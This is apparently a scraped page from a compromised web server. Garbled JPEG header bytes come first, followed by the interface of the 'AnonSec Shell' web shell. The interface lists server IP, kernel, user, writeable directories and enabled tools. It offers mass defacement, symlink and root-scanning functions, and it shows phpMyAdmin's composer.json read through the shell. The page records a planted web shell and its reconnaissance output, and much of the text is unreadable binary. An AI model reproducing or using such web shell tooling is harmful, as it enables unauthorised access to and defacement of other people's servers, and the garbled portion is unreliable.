JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 52.223.31.75  /  Your IP : 172.31.44.28   [ Reverse IP ]
Web Server : Apache/2.4.67 () OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux ip-172-31-14-184.eu-central-1.compute.internal 4.14.281-212.502.amzn2.x86_64 #1 SMP Thu May 26 09:52:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
Domains : 4 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www_condiviso/phpmyadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www_condiviso/phpmyadmin/composer.json
{
    "name": "phpmyadmin/phpmyadmin",
    "type": "project",
    "description": "A web interface for MySQL and MariaDB",
    "keywords": ["phpmyadmin","mysql","web"],
    "homepage": "https://www.phpmyadmin.net/",
    "support": {
        "security": "https://www.phpmyadmin.net/security/",
        "forum": "https://www.phpmyadmin.net/support/",
        "issues": "https://github.com/phpmyadmin/phpmyadmin/issues",
        "wiki": "https://wiki.phpmyadmin.net/",
        "docs": "https://docs.phpmyadmin.net/",
        "source": "https://github.com/phpmyadmin/phpmyadmin"
    },
    "license": "GPL-2.0-only",
    "authors": [
        {
            "name": "The phpMyAdmin Team",
            "email": "developers@phpmyadmin.net",
            "homepage": "https://www.phpmyadmin.net/team/"
        }
    ],
    "non-feature-branches": ["RELEASE_.*"],
    "autoload": {
        "psr-4": {
            "PhpMyAdmin\\": "libraries/classes"
        },
        "files": ["vendor/phpmyadmin/motranslator/src/functions.php"],
        "exclude-from-classmap": [
            "/test/",
            "/vendor/tecnickcom/tcpdf/tcpdf_barcodes_*.php",
            "/vendor/tecnickcom/tcpdf/tcpdf_import.php",
            "/vendor/tecnickcom/tcpdf/tcpdf_parser.php",
            "/vendor/tecnickcom/tcpdf/include/tcpdf_filters.php",
            "/vendor/tecnickcom/tcpdf/include/barcodes"
        ]
    },
    "autoload-dev": {
        "psr-4": {
            "PhpMyAdmin\\Tests\\": "test/classes",
            "PhpMyAdmin\\Tests\\Selenium\\": "test/selenium/"
        }
    },
    "repositories": [
        {
            "type": "composer",
            "url": "https://www.phpmyadmin.net"
        }
    ],
    "require": {
        "php": "^7.2.5 || ^8.0",
        "ext-hash": "*",
        "ext-iconv": "*",
        "ext-json": "*",
        "ext-mysqli": "*",
        "ext-openssl": "*",
        "ext-pcre": "*",
        "ext-xml": "*",
        "composer/ca-bundle": "^1.2",
        "google/recaptcha": "^1.1",
        "nikic/fast-route": "^1.3",
        "paragonie/sodium_compat": "^1.17",
        "phpmyadmin/motranslator": "^5.0",
        "phpmyadmin/shapefile": "^3.0.1",
        "phpmyadmin/sql-parser": "^5.8",
        "phpmyadmin/twig-i18n-extension": "^4.1.3 || ^5.0.0",
        "psr/http-factory": "^1.0",
        "psr/http-message": "^1.0",
        "slim/psr7": "^1.4.1",
        "symfony/config": "^5.2.3",
        "symfony/dependency-injection": "^5.2.3",
        "symfony/expression-language": "^5.2.3",
        "symfony/polyfill-ctype": "^1.17.0",
        "symfony/polyfill-mbstring": "^1.17.0",
        "symfony/polyfill-php80": "^1.16",
        "twig/twig": "^3.3.5",
        "webmozart/assert": "^1.10",
        "williamdes/mariadb-mysql-kbs": "^1.2"
    },
    "conflict": {
        "bacon/bacon-qr-code": "<2.0",
        "pragmarx/google2fa-qrcode": "<2.1",
        "tecnickcom/tcpdf": "<6.4.4"
    },
    "suggest": {
        "ext-curl": "Updates checking",
        "ext-opcache": "Better performance",
        "ext-zlib": "For gz import and export",
        "ext-bz2": "For bzip2 import and export",
        "ext-zip": "For zip import and export",
        "ext-gd2": "For image transformations",
        "ext-mbstring": "For best performance",
        "ext-sodium": "Better encryption performance",
        "tecnickcom/tcpdf": "For PDF support",
        "pragmarx/google2fa-qrcode": "^2.1 - For 2FA authentication",
        "bacon/bacon-qr-code": "^2.0 - For 2FA authentication",
        "code-lts/u2f-php-server": "For FIDO U2F authentication",
        "web-auth/webauthn-lib": "For better WebAuthn/FIDO2 authentication support"
    },
    "require-dev": {
        "bacon/bacon-qr-code": "^2.0",
        "code-lts/u2f-php-server": "^1.2",
        "php-webdriver/webdriver": "^1.13",
        "phpmyadmin/coding-standard": "^3.0.0",
        "phpstan/extension-installer": "^1.4",
        "phpstan/phpstan": "^1.12",
        "phpstan/phpstan-deprecation-rules": "^1.2",
        "phpstan/phpstan-phpunit": "^1.4",
        "phpstan/phpstan-strict-rules": "^1.6",
        "phpstan/phpstan-webmozart-assert": "^1.2",
        "phpunit/phpunit": "^8.5.16 || ^9.6",
        "pragmarx/google2fa-qrcode": "^2.1",
        "psalm/plugin-phpunit": "^0.16.1",
        "roave/security-advisories": "dev-latest",
        "symfony/console": "^5.2.3",
        "tecnickcom/tcpdf": "^6.4.4",
        "vimeo/psalm": "^4.30",
        "web-auth/webauthn-lib": "^3.3.2"
    },
    "extra": {
        "branch-alias": {
            "dev-master": "5.2.x-dev"
        }
    },
    "scripts": {
        "phpcbf": "@php phpcbf",
        "phpcs": "@php phpcs",
        "phpstan": "@php phpstan analyse",
        "psalm": "@php psalm --no-diff",
        "phpunit": "@php phpunit --color=always",
        "test": [
            "@phpcs",
            "@phpstan",
            "@psalm",
            "@phpunit"
        ],
        "update:baselines": [
            "@php phpstan analyse --generate-baseline",
            "@php psalm --set-baseline=psalm-baseline.xml"
        ],
        "twig-lint": "@php scripts/console lint:twig --ansi --show-deprecations"
    },
    "config":{
        "sort-packages": true,
        "discard-changes": true,
        "allow-plugins": {
            "dealerdirect/phpcodesniffer-composer-installer": true,
            "phpstan/extension-installer": true,
            "composer/package-versions-deprecated": true
        }
    },
    "version": "5.2.2"
}

Anon7 - 2022
AnonSec Team